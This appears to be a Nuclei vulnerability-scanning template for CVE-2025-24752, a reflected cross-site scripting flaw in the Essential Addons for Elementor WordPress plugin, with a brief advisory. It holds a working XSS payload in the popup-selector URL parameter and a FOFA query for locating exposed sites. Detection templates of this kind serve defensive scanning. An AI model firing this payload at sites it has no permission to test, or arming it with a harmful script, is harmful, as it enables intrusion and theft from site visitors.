A Cross-Site Scripting (XSS) vulnerability exists in Essential Addons for Elementor Plugin for WordPress versions prior to 6.0.15. The vulnerability allows an attacker to inject malicious JavaScript payloads into web pages by exploiting insufficient input sanitization and output escaping in specific plugin components.
PoC代码[已公开]
id: CVE-2025-24752
info:
name: Essential Addons for Elementor < 6.0.15 - Cross-Site Scripting
author: DhiyaneshDK
severity: medium
description: |
A Cross-Site Scripting (XSS) vulnerability exists in Essential Addons for Elementor Plugin for WordPress versions prior to 6.0.15. The vulnerability allows an attacker to inject malicious JavaScript payloads into web pages by exploiting insufficient input sanitization and output escaping in specific plugin components.
reference:
- https://www.tenable.com/plugins/was/114609
- https://patchstack.com/articles/reflected-xss-patched-in-essential-addons-for-elementor-affecting-2-million-sites/
- https://github.com/Sachinart/essential-addons-for-elementor-xss-poc/blob/main/poc.py
classification:
epss-score: 0.03132
epss-percentile: 0.86373
metadata:
verified: true
max-request: 1
fofa-query: body="/wp-content/plugins/essential-addons-for-elementor-lite"
tags: cve,cve2025,xss,essential,elementor-lite,vkev
variables:
random_int: '{{rand_int(1,1000)}}'
headless:
- steps:
- args:
url: '{{BaseURL}}/?popup-selector=<img_src%3Dx_onerror%3Dalert%28%27{{random_int}}n%27%29>&eael-lostpassword=1'
action: navigate
- action: waitdialog
name: subdomain_object_dom
matchers-condition: and
matchers:
- type: dsl
dsl:
- subdomain_object_dom == true
- type: word
part: body
words:
- "{{random_int}}"
case-insensitive: true
# digest: 490a0046304402206659b3e194ade586fffadfdd6e9c32d9f56e2780e07afe48f8704f7ad2cd50090220581e2071fdc9479bad04346def33cbe5927d2534ddff7b911c252a9f54680269:922c64590222798bb761d5b6d8e72950